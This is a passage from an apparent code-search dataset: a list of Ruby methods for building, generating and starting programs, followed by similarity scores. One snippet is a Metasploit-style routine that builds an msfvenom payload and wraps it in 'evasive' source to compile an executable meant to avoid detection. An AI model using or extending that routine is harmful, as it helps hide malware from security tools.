[\"platgen.log\", \"platgen.opt\", \"#{TMPDIR}/clock_generator*.log\"].each { |t|\n FileUtils.mv(t, \"#{GEN_SCRATCHDIR}/\") if File.file? t\n }\n\n # change timestamps\n\nend",
"def start\n\t\tend",
"def start_run\n # Abstract\n end",
"def start_run\n # Abstract\n end",
"def start\n @running = true\n gen_threads = start_generators\n writer = start_writer\n gen_threads.each(&:join)\n kill_proccess\n writer.join\n end",
"def run\n init\n\n printer = config.flamegraph? ? Printers::Flamegraph : Printers::Simple\n\n at_exit do\n File.write(build_path(), JSON.dump(result)) if config.json?\n printer.dump(result)\n end\n\n start\n end",
"def start\n yield\n end",
"def run\n puts \"\\nHere we go!\\n\\n\"\n make_output_directory\n build_jar\n create_android\n include_www\n generate_manifest\n copy_libs\n add_name_to_strings\n write_java\n puts \"\\nDone!\\n\\n\"\n `open #{@output_dir}`\n end",
"def start\n yield self if block_given?\n classpath = self.classpath.is_a?(Array) ? self.classpath : []\n start_process(classpath)\n end",
"def start\n backend.start\n end",
"def generate\n CfnMonitor::Generate.run(options)\n end",
"def generate()\n objects = []\n\n # generate object file tasks\n files.each do |fname|\n output_file = File.join(@build_dir, File.basename(fname).ext('o'))\n objects.push output_file\n file output_file => [ fname ] do\n get_toolchain().compile( fname, output_file )\n end\n end\n\n # Link object files\n file output_file() => objects do\n get_toolchain().link( objects, output_file() )\n end\n\n # Create top level task\n desc \"Build the #{@name} application\"\n task @name => [ output_file() ]\n end",
"def start\n assign_globals\n register_space\n start_message\n build_actions\n start_threads\n end",
"def run(inname, outname)\n\tgenerated = gen inname\n\n\tcopy_dependencies inname, outname, generated\n\n\tFile.write outname, generated\nend",
"def run\n # Change the working directory to the directory of this script.\n Dir.chdir(File.dirname(__FILE__)) \n\n # if LIST_TECHNIQUES is true, just output available evasion techniques.\n if datastore['LIST_TECHNIQUES'] == true\n print_available_techniques()\n else\n payload = datastore['PAYLOAD']\n payload_options = datastore['PAYLOAD_OPTIONS']\n output_directory = datastore['OUTPUT_DIRECTORY']\n executable_name = datastore['EXECUTABLE_NAME']\n evasion_stack = datastore['EVASION_STACK']\n msfvenom_path = datastore['MSFVENOM_PATH']\n\n if payload == nil\n print_error(\"PAYLOAD must be set.\")\n return \n end\n if output_directory == nil \n print_error(\"OUTPUT_DIRECTORY must be set.\")\n return\n end\n if executable_name == nil \n print_error(\"EXECUTABLE_NAME must be set.\") \n return\n end\n if msfvenom_path == \"\"\n # Guess at path to msfvenom\n msfvenom_path = Dir.pwd[0..(Dir.pwd.index(\"pro\")+3)]+\"msf3/msfvenom\"\n print_status(\"MSFVENOM_PATH not specified. Hoping msfvenom can be found at \"+msfvenom_path+\".\")\n end\n\n binary_generated = generate_binary(msfvenom_path, payload, payload_options)\n if binary_generated\n print_status(\"Payload binary generated successfully.\")\n print_status(\"Generating evasive source from generated binary.\")\n\n generate_evasive_source(evasion_stack)\n\n executable_generated = generate_executable(output_directory+\"/\"+executable_name)\n\n if executable_generated\n print_status(\"Executable successfully generated.\")\n else\n print_error(\"Unable to generate executable.\")\n end\n else\n print_error(\"Payload generation with msfvenom failed.\")\n end\n\n print_status(\"Cleaning up temporary files.\")\n\n if File.exist?('tmp/bin'+self.uuid+'.c')\n File.delete('tmp/bin'+self.uuid+'.c')\n end\n if File.exist?('tmp/evasive'+self.uuid+'.c')\n File.delete('tmp/evasive'+self.uuid+'.c')\n end\n\n end\n end",
"def run\n files_to_inspect.each do |path|\n SourceFile.new(\n linter_config: linter_config,\n io: io,\n path: path,\n root: root\n ).process\n end\n end",
"def start\n Vedeu.trigger(:_drb_start_)\n\n Vedeu::Terminal.open do\n Vedeu::Terminal.set_cursor_mode\n\n Vedeu.trigger(:_initialize_)\n\n runner { main_sequence }\n end\n end",
"def generate_code\n # only need to do this if code not set\n return if code\n\n ensure_unique_code\n end",
"def start(*)\n @module_started = true\n end",
"def start!\n process.start\n end",
"def start # :nodoc:\n log \"Starting\"\n end",
"def start\n\t\tinit\n\t end",
"def generate\n `bundle exec stasis`\nend",
"def run_scaffolds\n @file.each_pair do |class_name, spec|\n args = []\n args << class_name \n args += spec[\"fields\"].map do |field|\n \"#{field[\"name\"]}:#{field[\"type\"]}\"\n end\n args << '--timestamps'\n Rails::Generators.invoke \"rails:scaffold\", args\n end\n end",
"def start\n _bootstrap!\n self.started = true\n end",
"def start\n puts options\n config = Configuration.new(options)\n puts config.build\n exit(0)\n end",
"def start!\n verbose('Starting...')\n\n process_kaizen_archive(\n save_to_tempfile('https://codeload.github.com/Wixel/Kaizen/zip/master')\n )\n\n process_normalize_archive(\n save_to_tempfile('https://codeload.github.com/necolas/normalize.css/zip/master')\n )\n\n install_bourbon!\n end",
"def start\n jammit\n end",
"def start\n raise \"NotImplemented\"\n end",
"def run\n setup\n build_vm\n package_stemcell\n cleanup\n @target\n end",
"def run\n setup\n build_vm\n package_stemcell\n cleanup\n @target\n end",
"def invoke(namespace, args = ARGV, config = {})\n names = namespace.to_s.split(\":\")\n if klass = find_by_namespace(names.pop, names.any? && names.join(\":\"))\n args << \"--help\" if args.empty? && klass.arguments.any?(&:required?)\n klass.start(args, config)\n run_after_generate_callback if config[:behavior] == :invoke\n else\n options = sorted_groups.flat_map(&:last)\n error = Command::CorrectableNameError.new(\"Could not find generator '#{namespace}'.\", namespace, options)\n\n puts <<~MSG\n #{error.detailed_message}\n Run `bin/rails generate --help` for more options.\n MSG\n end\n end",
"def initial_generate\n \n end",
"def start\n setup_files\n create_report\nend",
"def start\n put :start\n end",
"def gen\n @genFlag = true\n res = ln((@overrideFlag ? '@Override ' : '') + 'public '+ (@static ? 'static ' : '') + @type + ' ' + @name + '(' +\n @args.collect {|var| (var.className.nil? ? var.type : var.className.name) + (var.instance_of?(Arr) ? '[]' * var.ndim : '') + ' ' + var.name}.join(', ') +\n ') {') + \"\\n\"\n shift(1)\n res+=ln('if ('+@args[0].name+'.length > 0) FuzzerUtils.seed('+rand(100000000).to_s+' + Long.parseLong('+@args[0].name+'[0]));') if @mainTestFlag and $conf.outer_control\n res+=ln('instanceCount++;') if @constructorFlag\n res += @context.genDeclarations() if !@mainFlag # no declarations should be generated for main method\n @rootStmt.nestedStmts['body'].each {|st| res += st.gen()} if !@mainFlag # no statements should be generated for main method\n res += ln('FuzzerUtils.joinThreads();') if @mainTestFlag && $run_methods>0\n res += (@mainTestFlag ? @context.genResPrint() + @methClass.context.genResPrint() : '')\n res += (!(@mainTestFlag||@mainFlag) ? genEnding() : '')\n glob = (@mainTestFlag ? @methClass.genGlobCheckSums() : '')\n#main method:\n if @mainFlag \n res += ln(\"try {\")\n shift(1)\n res += ln(@methClass.name + \" _instance = new \" + @methClass.name + \"();\")\n res += ln(\"for (int i = 0; i < \" + $conf.mainTest_calls_num.to_s + \"; i++ ) {\")\n shift(1)\n res += ln(\"_instance.\" + @methClass.methMainTest.name + \"(\" + @args[0].name + \");\")\n shift(-1)\n res += ln(\"}\")\n if ($conf.time_sleep_complete_tier1 > 0)\n res += ln(\"try {\") + ln(\"Thread.sleep(\" + $conf.time_sleep_complete_tier1.to_s + \");\") + ln(\" } catch (InterruptedException ie) {\") \n shift(1)\n res += ln(\"ie.printStackTrace();\") \n shift(-1)\n res += ln(\"}\")\n end\n if $conf.mainTest_calls_num_tier2 > 0\n res += ln(\"for (int i = 0; i < \" + $conf.mainTest_calls_num_tier2.to_s + \"; i++ ) {\")\n\n shift(1)\n res += ln(\"_instance.\" + @methClass.methMainTest.name + \"(\" + @args[0].name + \");\")\n shift(-1)\n res = res + ln(\"}\")\n end\n shift(-1)\n res += ln(\" } catch (Exception ex) {\")\n shift(1)\n res += ln(\"FuzzerUtils.out.println(ex.getClass().getCanonicalName());\")\n shift(-1)\n res += ln(\" }\")\n\n end\n \n res += \"\\n\" + glob unless glob.empty?\n\n shift(-1)\n res + ln(\"}\")\n end",
"def start\r\n return if running?\r\n\r\n log(\"Starting Runner...\")\r\n run!\r\n end",
"def start\n main_loop\n end",
"def start\n raise NotImplementedError\n end",
"def start\n @cmd.parse\n end",
"def run\n if @initializer.nil?\n @initializer = new\n \n yield @initializer.configuration if block_given?\n @initializer.process\n \n start_app\n else\n yield @initializer.configuration if block_given?\n end\n end",
"def run\n return unless setup_compilable\n\n @collection.files.values.each do |pointer|\n compiled_file = File.join(@collection.compiled_path, pointer['id'])\n FileUtils.mkdir_p File.dirname(compiled_file)\n FileUtils.cp_r pointer['realpath'], compiled_file\n Ruhoh::Friend.say { green \" > #{pointer['id']}\" }\n end\n end",
"def run\n return unless setup_compilable\n\n @collection.files.values.each do |pointer|\n compiled_file = File.join(@collection.compiled_path, pointer['id'])\n\n FileUtils.mkdir_p File.dirname(compiled_file)\n FileUtils.cp_r pointer['realpath'], compiled_file\n\n Ruhoh::Friend.say { green \" > #{pointer['id']}\" }\n end\n end",
"def execute\n\n logger = Logger.new(\"/dev/null\")\n logger.level = Logger::WARN\n log_adapter = JerichoLoggerAdapter.new(logger)\n\n perl_pages = File.join(top_git_directory, 'java/code/**/*.{jsp,jspf}')\n java_pages = File.join(top_git_directory, 'web//**/*.{pxt, pxi}')\n [perl_pages, java_pages].each do |pages|\n Dir.glob(pages).each do |path|\n content = File.read(path)\n on_file_start(content, path)\n source = Source.new(content)\n source.setLogger(log_adapter)\n out = OutputDocument.new(source)\n\n tags = source.getAllStartTags\n tags.each do |tag|\n if applicable?(tag)\n process_tag(source, out, tag, path)\n end\n end\n\n on_file_changed(content, out.toString, path)\n on_file_done(path)\n end\n end\n\n Dir.glob(File.join(top_git_directory, 'java/code/**/*.{java}')).each do |path|\n content = File.read(path)\n on_file_start(content, path)\n on_file_done(path)\n end\n\n Dir.glob(File.join(top_git_directory, 'web/**/*.{pm}')).each do |path|\n content = File.read(path)\n on_file_start(content, path)\n on_file_done(path)\n end\n\n on_done\n end",
"def run\n super\n create_easy_type_source\n create_simple_provider_source\n create_name_attribute_source\n end",
"def run!\n # Validate paths\n validate_paths!\n \n # Extract mockup\n copy_source_path_to_build_path!\n \n validate_stack!\n \n # Run stack\n run_stack!\n \n # Run finalizers\n run_finalizers!\n \n # Cleanup\n cleanup! if self.config[:cleanup_build]\n \n end",
"def start\n Command::Installer::Start.new(\n *command_params\n ).execute\n rescue => e\n catch_errors(e)\n end"
] |
[
"0.6937173",
"0.68181866",
"0.6668282",
"0.6487096",
"0.6418716",
"0.6359246",
"0.6329479",
"0.627829",
"0.6231169",
"0.6229854",
"0.6223654",
"0.62168235",
"0.62136465",
"0.62136465",
"0.62136465",
"0.62136465",
"0.6199343",
"0.6188479",
"0.6188479",
"0.6182261",
"0.6179925",
"0.6179925",
"0.6179925",
"0.6179925",
"0.6179925",
"0.6179925",
"0.6179925",
"0.6179925",
"0.61622626",
"0.6154483",
"0.6151426",
"0.6146258",
"0.61371267",
"0.613171",
"0.6116288",
"0.61073786",
"0.6097941",
"0.60933465",
"0.6090688",
"0.60840976",
"0.60833746",
"0.6075945",
"0.6075886",
"0.60705984",
"0.606806",
"0.6027264",
"0.6025044",
"0.6014498",
"0.6001599",
"0.599998",
"0.59986126",
"0.59986126",
"0.59977174",
"0.5994944",
"0.5993251",
"0.59930736",
"0.59930736",
"0.5986128",
"0.5965301",
"0.5954676",
"0.59517175",
"0.59446084",
"0.59158105",
"0.5906867",
"0.5902481",
"0.58908564",
"0.58789486",
"0.5866812",
"0.5853431",
"0.5836456",
"0.5821694",
"0.5816283",
"0.5808403",
"0.5802383",
"0.57976204",
"0.57892305",
"0.5786843",
"0.5785689",
"0.5783933",
"0.57822204",
"0.57783884",
"0.5777484",
"0.5764819",
"0.5764076",
"0.5757387",
"0.574676",
"0.57457834",
"0.57446635",
"0.57441676",
"0.572567",
"0.5719871",
"0.57186073",
"0.5714347",
"0.5713147",
"0.5711973",
"0.57055664",
"0.569284",
"0.5690132",
"0.56879807",
"0.56864685"
] |
0.6083291
|
41
|
Write out the generated code into files. build must be called before this step, or nothing will be written out.
|
def write
Logger.info "Writing code to files"
prepare_working_dir
process_other_source_files
# Create the code
writer_class = @writer_mode == :multiple ? Writers::MultipleFilesWriter : Writers::SingleFileWriter
writer_class.new(@builder, @working_dir).write
# Create the extconf.rb
extconf = Writers::ExtensionWriter.new(@builder, @working_dir)
extconf.options = @options
extconf.write
Logger.info "Files written"
end
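
Combining this with build above, a minimal end-to-end sketch; the class name, accessors, and call order shown are assumptions for illustration:

# Hypothetical flow; write depends on @builder, so build must run first.
ext = Extension.new("wrapper")
ext.working_dir = "gen"       # generated files land here
ext.writer_mode(:multiple)    # default mode; :single is the other option
ext.build                     # populates @builder
ext.write                     # emits the source files plus extconf.rb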
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def generate\n setup\n\n write_style_sheet\n generate_index\n generate_class_files\n generate_file_files\n generate_table_of_contents\n @json_index.generate\n @json_index.generate_gzipped\n\n copy_static\n\n rescue => e\n debug_msg \"%s: %s\\n %s\" % [\n e.class.name, e.message, e.backtrace.join(\"\\n \")\n ]\n\n raise\n end",
"def generate()\n prepare\n ::Dir.mkdir(@output_path) unless ::File.exists? @output_path\n\n @pages.each do |name, page|\n SiteLog.debug(\"Starting page generation - #{name}\")\n page.generate(@output_path, @version, @preserve_tree)\n SiteLog.debug(\"Finished page generation - #{name}\")\n end\n\n @files.each do |path, data|\n path = ::File.join(@output_path, path)\n ::FileUtils.mkdir_p(::File.dirname(path))\n ::File.open(path, \"w\") do |f|\n f.write(data)\n end\n end\n end",
"def write\n\t\t#clear the directory before doing anything else\n\t\tclear @path\n\n\t\t#write out source code files\n\t\t@molds.each do |mold|\n\t\t\twrite_object(mold.name + \".h\", header(mold))\n\t\t\twrite_object(mold.name + \".m\", source(mold))\n\t\tend\n\tend",
"def generate(output_folder, types, version_name)\n generate_objects(output_folder, types, version_name)\n copy_files(output_folder) \\\n unless @config.files.nil? || @config.files.copy.nil?\n compile_examples(output_folder) unless @config.examples.nil?\n compile_changelog(output_folder) unless @config.changelog.nil?\n # Compilation has to be the last step, as some files (e.g.\n # CONTRIBUTING.md) may depend on the list of all files previously copied\n # or compiled.\n compile_files(output_folder, version_name) \\\n unless @config.files.nil? || @config.files.compile.nil?\n\n generate_datasources(output_folder, types, version_name) \\\n unless @config.datasources.nil?\n apply_file_acls(output_folder) \\\n unless @config.files.nil? || @config.files.permissions.nil?\n end",
"def run(inname, outname)\n\tgenerated = gen inname\n\n\tcopy_dependencies inname, outname, generated\n\n\tFile.write outname, generated\nend",
"def build\n sync\n output_dir.mkpath\n outputs.each(&:build)\n output_dir.touch\n end",
"def build!\n create_output_directory\n spec.source_directories.each { |d| simple_compile_directory(d) }\n compile_files(spec.all_javascript_paths)\n compile_files(spec.all_stylesheet_paths)\n write_manifest\n end",
"def write\n make_parent_directory\n generate_file\n end",
"def generate\n if @options.dry_run then\n # do nothing\n @generator.generate\n else\n Dir.chdir @options.op_dir do\n unless @options.quiet then\n $stderr.puts \"\\nGenerating #{@generator.class.name.sub(/^.*::/, '')} format into #{Dir.pwd}...\"\n end\n\n @generator.generate\n update_output_dir '.', @start_time, @last_modified\n end\n end\n end",
"def generate (path)\n File.open(path, \"w\") do |f|\n @output.each do |line|\n f.puts line\n end\n end \n end",
"def generate()\n objects = []\n\n # generate object file tasks\n files.each do |fname|\n output_file = File.join(@build_dir, File.basename(fname).ext('o'))\n objects.push output_file\n file output_file => [ fname ] do\n get_toolchain().compile( fname, output_file )\n end\n end\n\n # Link object files\n file output_file() => objects do\n get_toolchain().link( objects, output_file() )\n end\n\n # Create top level task\n desc \"Build the #{@name} application\"\n task @name => [ output_file() ]\n end",
"def generate_build\n filename = \"#{self.build_path}/#{ANT_BUILD_NAME}\"\n log \"Writing build xml to #{filename}\"\n File.open(filename, 'w') do |f|\n f.write(self.build_doc)\n f.close\n end\n filename\n end",
"def genWritables(model, outRoot)\n firstRecord = model.records.values.first\n pyPackage, base, packagePath = DataMetaDom::PojoLexer::assertNamespace(firstRecord.name)\n # Next: replace dots with underscores.The path also adjusted accordingly.\n #\n # Rationale for this, quoting PEP 8:\n #\n # Package and Module Names\n #\n # Modules should have short, all-lowercase names. Underscores can be used in the module name if it improves\n # readability. Python packages should also have short, all-lowercase names, although the use of underscores\n # is discouraged.\n #\n # Short and all-lowercase names, and improving readability if you have complex system and need long package names,\n # is \"discouraged\". Can't do this here, our system is more complicated for strictly religous, \"pythonic\" Python.\n # A tool must be enabling, and in this case, this irrational ruling gets in the way.\n # And dots are a no-no, Python can't find packages with complicated package structures and imports.\n #\n # Hence, we opt for long package names with underscores for distinctiveness and readability:\n pyPackage = pyPackage.gsub('.', '_')\n packagePath = packagePath.gsub('/', '_')\n destDir = File.join(outRoot, packagePath)\n FileUtils.mkdir_p destDir\n wriOut = nil # File.open(File.join(destDir, \"#{writableClassName(base)}.py\"), 'wb')\n serFile = File.join(destDir, 'serial.py')\n FileUtils.rm serFile if File.file?(serFile)\n ioOut = File.open(serFile, 'wb') # one huge serialization file\n ioOut.puts %|# This file is generated by DataMeta DOM. Do not edit manually!\n#package #{pyPackage}\n\nfrom hadoop.io import WritableUtils, InputStream, OutputStream, Text\nfrom ebay_datameta_core.base import DateTime\nfrom decimal import *\nfrom collections import *\nfrom bitarray import bitarray\nfrom ebay_datameta_hadoop.base import *\nfrom model import *\n\n|\n begin\n model.records.values.each { |e|\n _, base, _ = DataMetaDom::PojoLexer::assertNamespace(e.name)\n case\n when e.kind_of?(DataMetaDom::Record)\n genWritable model, wriOut, ioOut, e, pyPackage, base\n else\n raise \"Unsupported Entity: #{e.inspect}\"\n end\n }\n ensure\n begin\n ioOut.close\n ensure\n #wriOut.close\n end\n end\n end",
"def build\n clean_build_directory\n copy_templates\n copy_functions\n copy_includes\n build_assets\n end",
"def generate(output_folder, types, _product_path, _dump_yaml, generate_code, generate_docs)\n generate_objects(\n output_folder,\n types,\n generate_code,\n generate_docs\n )\n end",
"def generate( toplevels )\n\t\t@outputdir = Pathname.new( @options.op_dir ).expand_path( @basedir )\n\t\tif RDoc::Generator::Context.respond_to?( :build_indicies)\n\t \t@files, @classes = RDoc::Generator::Context.build_indicies( toplevels, @options )\n\t\telse\n\t \t@files, @classes = RDoc::Generator::Context.build_indices( toplevels, @options )\n\t\tend\n\n\t\t# Now actually write the output\n\t\tgenerate_xhtml( @options, @files, @classes )\n\n\trescue StandardError => err\n\t\tdebug_msg \"%s: %s\\n %s\" % [ err.class.name, err.message, err.backtrace.join(\"\\n \") ]\n\t\traise\n\tend",
"def generate( toplevels )\n\t\t@outputdir = Pathname.new( @options.op_dir ).expand_path( @basedir )\n\t\tif RDoc::Generator::Context.respond_to?( :build_indicies)\n\t \t@files, @classes = RDoc::Generator::Context.build_indicies( toplevels, @options )\n\t\telse\n\t \t@files, @classes = RDoc::Generator::Context.build_indices( toplevels, @options )\n\t\tend\n\n\t\t# Now actually write the output\n\t\tgenerate_xhtml( @options, @files, @classes )\n\n\trescue StandardError => err\n\t\tdebug_msg \"%s: %s\\n %s\" % [ err.class.name, err.message, err.backtrace.join(\"\\n \") ]\n\t\traise\n\tend",
"def rebuild(options)\n puts \"rebuilding to #{options[:out]}\"\n puts options[:files].inspect\n File.open(options[:out], 'w') do |out|\n # out.write @pre if @pre\n\n options[:files].each do |file|\n out.write wrap_source file\n end\n\n if options[:main]\n main = options[:main].sub(/\\.rb$/, '')\n out.write \"opal.require('#{main}');\\n\"\n end\n\n # out.write @post if @post\n end\n end",
"def build\n puts \"---> erase_old_files\" if verbose\n erase_old_files\n puts \"---> load_source\" if verbose\n load_source\n puts \"---> compose\" if verbose\n compose\n puts \"---> save_lilypond_file\" if verbose\n save_lilypond_file\n\n # Production du PDF ou du PNG\n res = case output_format\n when :pdf, nil\n puts \"---> output_as_pdf\" if verbose\n output_as_pdf\n when :png\n puts \"---> output_as_png\" if verbose\n output_as_png\n else\n puts \"Format de sortie inconnu (#{output_format}). Je sors en pdf\" if verbose\n output_as_pdf\n end\n\n if res === false || verbose\n App::show_debug\n end\n end",
"def generate()\n traverse(@root)\n @un_arr.traverseUnions if @@union_flag\n @un_arr.traverseArrays if @@dyn_array_flag\n write_to_file\n end",
"def generate\n verify_path\n \n self.layouts.each {|layout| layout.write_file}\n self.pages.each {|page| page.write_file}\n \n Webby.site.content_dir = self.content_dir\n Webby.site.layout_dir = self.layout_dir\n Webby.site.template_dir = self.template_dir\n Webby.site.output_dir = self.output_dir\n \n Merb.logger.debug \"content_dir: #{Webby.site.content_dir}\"\n Merb.logger.debug \"layout_dir: #{Webby.site.layout_dir}\"\n Merb.logger.debug \"template_dir: #{Webby.site.template_dir}\"\n Merb.logger.debug \"output_dir: #{Webby.site.output_dir}\"\n \n # Use directory => '.' option to generate the site in output_dir\n Webby.site.page_defaults = {'layout' => self.default_layout.relative_path,\n 'directory' => '.',\n 'collision' => :force}\n \n Merb.logger.debug \"page_defaults: #{Webby.site.page_defaults}\" \n # returns nil if success \n # Webby::Builder.run\n Webby::Builder.run :rebuild => true\n end",
"def generate!\n info \"GENERATE\"\n\n f = Generator.new @dbi, @settings, @logger\n xslt = XML::XSLT.new\n xslt.xml = f.generate_root.to_s\n\n default_template_dir = File.dirname(__FILE__) + '/../../data/templates'\n template_dir = @settings['templates'] || default_template_dir\n output_dir = @settings['output']\n\n task \"copy static files\" do\n FileUtils.mkdir_p output_dir\n FileUtils.cp_r Dir[File.join( template_dir, 'static', '*' )], output_dir\n end\n\n begin\n Dir.foreach(template_dir) { |template_file|\n next if template_file =~ /^\\./ || template_file == 'static'\n\n task \"process #{template_file}\" do\n xslt.xsl = File.join( template_dir, template_file )\n File::open( File.join( output_dir, template_file ), 'w') { |f| f.write(xslt.serve) }\n end\n }\n rescue Errno::ENOENT\n warn \"Couldn't find templates directory, fallback to default templates!\"\n template_dir = default_template_dir\n retry\n end\n end",
"def generate_output(inputs, output)\n inputs.each do |input|\n begin\n raise error (\"I need a file to compile\") if not input.respond_to?(:read)\n\n #puts \"tsc: #{input.path} \" << options.join(\" \")\n\n #Using compile_file because it gives us better error messages\n result = TypeScript::Node::compile_file(input.fullpath, options)\n if result.success?\n output.write(result.js)\n else\n raise result.stderr\n end\n rescue ExecJS::Error => error\n raise error, \"Error compiling #{input.path}. #{error.message}\"\n rescue RuntimeError => e\n raise e, \"Error compiling #{input.path}. #{e.message}\"\n end\n end\n end",
"def build()\n\t`rm -rf recordings/`\n\t`mkdir recordings`\n\t`rm -rf chapters/`\n\t`mkdir chapters`\n\t`rm -rf outputList.txt`\n\t`touch outputList.txt`\nend",
"def generate_output\n write_average_fitness('output/average.txt')\n write_best_fitness('output/best.txt')\n write_survivors('output/survivors.txt')\n write_traits('output/traits.txt')\n end",
"def generate\n\t\t dir = \"./experiments/\" + @arguments.first\n\t\t\tDir.mkdir(dir)\n\t\t\tFile.open(dir + \"/\" + @arguments.first + \".rb\", \"w\") do |req_file|\n\t\t\t req_file.puts \"# ## #{as_human_name @arguments.first} ##\"\n\t\t\t req_file.puts \"# \"+@options.description.split(\"\\n\").join(\"\\n# \")\n\t\t\t req_file.puts\n\t\t\t req_file.puts\n\t\t\t req_file.puts \"# The first contious block of comment will be included in your report.\"\n\t\t\t req_file.puts \"# This includes the reference implementation.\"\n\t\t\t req_file.puts \"# Override any desired files in this directory.\"\n\t\t\t Dir[\"./app/**/*.{rb,o,dll,so,bundle}\"].each do |f|\n\t\t\t next if File.basename(f) == 'extconfig.rb'\n\t\t\t p = File.expand_path(f).split(\"/\") - File.expand_path(\".\").split(\"/\")\n\t\t\t req_file.puts \"require \\\"#{p.join(\"/\").gsub(/\\.(rb|o|dll|so|bundle)$/, \"\")}\\\"\"\n\t\t\t end\n\t\t\t req_file.puts \"\\nclass #{as_class_name @arguments.first} < MyExperiment\\n\\t\\nend\"\n\t\t\tend\n\t\t\tFile.open(dir + \"/config.yaml\", \"w\") do |f|\n\t\t\t f << \"---\\nexperiment:\\n development:\\n compute:\\n\"\n end\n end",
"def generator\n printf(\"%-10s %s\\n\",\"generator:\", \"generating.. (*hdls, *bmm, *scr, *prj)\")\n exitcode = 1\n FileUtils.rm_r Dir.glob(\"#{TMPDIR}/hdl/*.vhd\")\n FileUtils.rm_r Dir.glob(\"#{TMPDIR}/synthesis/*.vhd\")\n File.symlink(\"../pcores\", \"#{TMPDIR}/pcores\") unless File.symlink?(\"#{TMPDIR}/pcores\")\n pipe = IO.popen(\"platgen -od #{TMPDIR}/ -p xc4vfx100ff1152-10 -lang vhdl ../system.mhs\", \"r+\")\n # pipe = IO.popen(\"platgen -p xc4vfx12ff668-10 system.mhs\", \"r+\")\n pipe.each do |line|\n # puts line\n # do not synthesize\n if line =~ /Running XST synthesis/\n exitcode = 0\n Process.kill 'TERM', pipe.pid\n break\n end\n end\n unless exitcode == 0\n p \"# Error with platgen - check platgen.log\"\n exit\n end\n\n # he generated files under $PROJECT/TMPDIR/{hdl,synthesis}\n # copy them to $PROJECT/hdl/ under certain conditions (size differs & or abstence)\n FileUtils.mkdir('hdl') unless File.directory? 'hdl'\n FileUtils.mkdir('synthesis') unless File.directory? 'synthesis'\n FileUtils.mkdir_p(BMM_RESULTSDIR) unless File.directory? BMM_RESULTSDIR # output directory\n\n # move_files_if(\"#{TMPDIR}/hdl/*.vhd\")\n move_files_if(\"#{TMPDIR}/implementation/#{TOPLEVEL}.bmm\", BMM_RESULTSDIR)\n move_files_if(\"#{TMPDIR}/synthesis/*.scr\" )\n move_files_if(\"#{TMPDIR}/synthesis/*.prj\")\n Find.find(\"#{TMPDIR}/hdl\") do |path|\n move_files_if(path) if File.file? path\n end\n\n # move logfiles to scratch\n FileUtils.mkdir_p(GEN_SCRATCHDIR) unless File.directory? GEN_SCRATCHDIR\n [\"platgen.log\", \"platgen.opt\", \"#{TMPDIR}/clock_generator*.log\"].each { |t|\n FileUtils.mv(t, \"#{GEN_SCRATCHDIR}/\") if File.file? t\n }\n\n # change timestamps\n\nend",
"def write_file\n \n # if dirty?\n generate\n \n delete_file\n File.open(absolute_path.gsub(/\\.txt$/, \"\"), 'w+') do |f| \n f.write(generated_header)\n f.write(generated_content)\n end\n # not_dirty\n # end\n end",
"def write_depends\r\n @source_files.each { |file|\r\n depends = []\r\n flatten_depends depends, file\r\n @flat_depends[file] = depends\r\n }\r\n FileUtils.mkdir_p File.dirname(@file)\r\n File.open(@file, 'w') { |f|\r\n @flat_depends.each { |src, deps|\r\n f << \"add_dep '#{src}', [\"\r\n if deps and not deps.empty?\r\n f << \"'#{deps.join(\"', '\")}'\" end\r\n f << \"]\\n\"\r\n }\r\n f << \"\\n\"\r\n }\r\n end",
"def generate; end",
"def generate; end",
"def generate #(args, opts)\n actionlist = actionlist(copylist)\n\n if actionlist.empty?\n logger.report_nothing_to_generate\n return\n end\n\n source = '' # FIXME\n logger.report_startup(source, output)\n mkdir_p(output) #unless File.directory?(output)\n Dir.chdir(output) do\n actionlist.each do |action, loc, src, dest, opts|\n atime = Time.now\n result, fulldest = *__send__(action, loc, src, dest, opts)\n logger.report_create(relative_to_output(dest), result, atime)\n #logger.report_create(dest, result, atime)\n end\n end\n logger.report_complete\n logger.report_fixes #if session.newproject?\n end",
"def build\n raise ConfigurationError.new(\"Must specify working directory\") unless @working_dir\n raise ConfigurationError.new(\"Must specify which sources to wrap\") unless @parser\n\n Logger.info \"Beginning code generation\"\n\n @builder = Builders::ExtensionNode.new(@name, @node || @parser, @modules)\n @builder.add_includes @options[:includes]\n @builder.build\n @builder.sort\n\n Logger.info \"Code generation complete\"\n end",
"def generate_class_files\n debug_msg \"Generating class documentation in #@outputdir\"\n templatefile = Pathname.new(File.dirname(__FILE__) + '/template/railsfish/classpage.rhtml')\n \n @classes.each do |klass|\n debug_msg \" working on %s (%s)\" % [ klass.full_name, klass.path ]\n outfile = @outputdir + klass.path\n rel_prefix = @outputdir.relative_path_from( outfile.dirname )\n svninfo = self.get_svninfo( klass )\n \n debug_msg \" rendering #{outfile}\"\n self.render_template( templatefile, binding(), outfile )\n end\n end",
"def create_output\n test_case = TestCase.find(params[:id])\n tempDirectory = Rails.configuration.compile_directory + current_user.name.tr(\" \", \"_\") + '_' + test_case.id.to_s + '/'\n if not Dir.exists?(tempDirectory) \n Dir.mkdir(tempDirectory)\n end\n\n # Adds in the test case files\n test_case.create_directory(tempDirectory)\n\n # Compiles and runs the program\n comp_status = test_case.compile_code(tempDirectory)\n\n if comp_status.nil?\n flash[:notice] = \"Outputs Made\"\n else\n flash[:notice] = \"No Outputs Made\"\n flash[:comperr] = comp_status\n end\n\n FileUtils.rm_rf(tempDirectory)\n\n respond_to do |format|\n format.js { render :action => \"refresh_output\" }\n end\n end",
"def build\n asdocs = scan(@src)\n\n if asdocs.empty?\n puts \"No .asdoc files found.\"\n else\n create_xml(asdocs)\n to_disk(xml)\n end\n end",
"def generate_all\n copy_template_dir('layouts', 'layouts')\n copy_template_dir('content/bootstrap', 'content/bootstrap')\n copy_template_dir('content/content', 'content/content')\n delete_target_file('lib/default.rb')\n copy_template_dir('lib', 'lib')\n delete_target_file('Rules')\n copy_template_file('Rules', 'Rules')\n copy_template_file('.gitignore', '.gitignore')\n copy_template_file('cg_config.rb', 'cg_config.rb')\n copy_template_file('cg_config.rb_sample', 'cg_config.rb_sample')\n delete_target_file('content/stylesheet.css')\n delete_target_file('content/index.html')\n delete_target_file('layouts/default.html')\n create_empty_dir('content/images')\n end",
"def generate\n end",
